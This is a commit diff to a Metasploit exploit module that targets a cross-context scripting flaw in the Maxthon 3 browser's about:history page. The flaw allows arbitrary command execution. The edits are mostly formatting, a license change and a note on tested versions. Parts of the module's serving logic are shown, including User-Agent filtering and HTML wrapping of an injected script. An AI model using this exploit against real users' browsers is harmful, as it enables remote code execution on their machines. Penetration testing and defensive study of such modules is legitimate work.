More changes

Author: sinn3r

modules/exploits/windows/browser/maxthon_history_xcs.rb

@@ -16,56 +16,59 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name' => 'Maxthon3 about:history XCS',
-			'Description' => %q{
+			'Name'           => 'Maxthon3 about:history XCS Trusted Zone Code Execution',
+			'Description'    => %q{
 				Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
 				Injection in such privileged/trusted browser zone can be used to modify
 				configuration settings and execute arbitrary commands.
+
+				Please note this module only works against specific versions of XCS. Currently,
+				we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
 			},
-			'License' => BSD_LICENSE,
-			'Author' =>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
 					'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
 					'sinn3r', # msf module
 					'juan vazquez' # msf module
 				],
 			'References' =>
 				[
-						['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
+					['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html']
 				],
 			'Payload' =>
 				{
-				'DisableNops' => true,
+					'DisableNops' => true
 				},
 			'Platform'       => 'win',
 			'Targets' =>
 				[
 					['Maxthon 3 (prior to 3.3) on Windows', {} ]
 				],
 			'DisclosureDate' => 'Nov 26 2012',
-			'DefaultTarget' => 0
+			'DefaultTarget'  => 0
 		))
 	end
 
 	def on_request_uri(cli, request)
-
 		if request.headers['User-agent'] !~ /Maxthon\/3/ or request.headers['User-agent'] !~ /AppleWebKit\/534.12/
 			print_status("Sending 404 for User-Agent #{request.headers['User-agent']}")
 			send_not_found(cli)
 			return
 		end
 
-			html_hdr = %Q^
-			<html>
-			<head>
-			<title>Loading</title>
-			^
-		html_ftr = %Q^
-			</head>
-			<body >
-			<h1>Loading</h1>
-			</body></html>
-			^
+		html_hdr = %Q|
+		<html>
+		<head>
+		<title>Loading</title>
+		|
+
+		html_ftr = %Q|
+		</head>
+		<body >
+		<h1>Loading</h1>
+		</body></html>
+		|
 
 		case request.uri
 			when /\?jspayload/
@@ -99,13 +102,15 @@ def on_request_uri(cli, request)
 					location.href = "about:history";
 				}
 				|
+
 				content = %Q|
 				#{html_hdr}
 				<script>
 				#{js}
 				</script>
 				#{html_ftr}
 				|
+
 			when get_resource()
 				print_status("Sending #{self.name} payload for request #{request.uri}")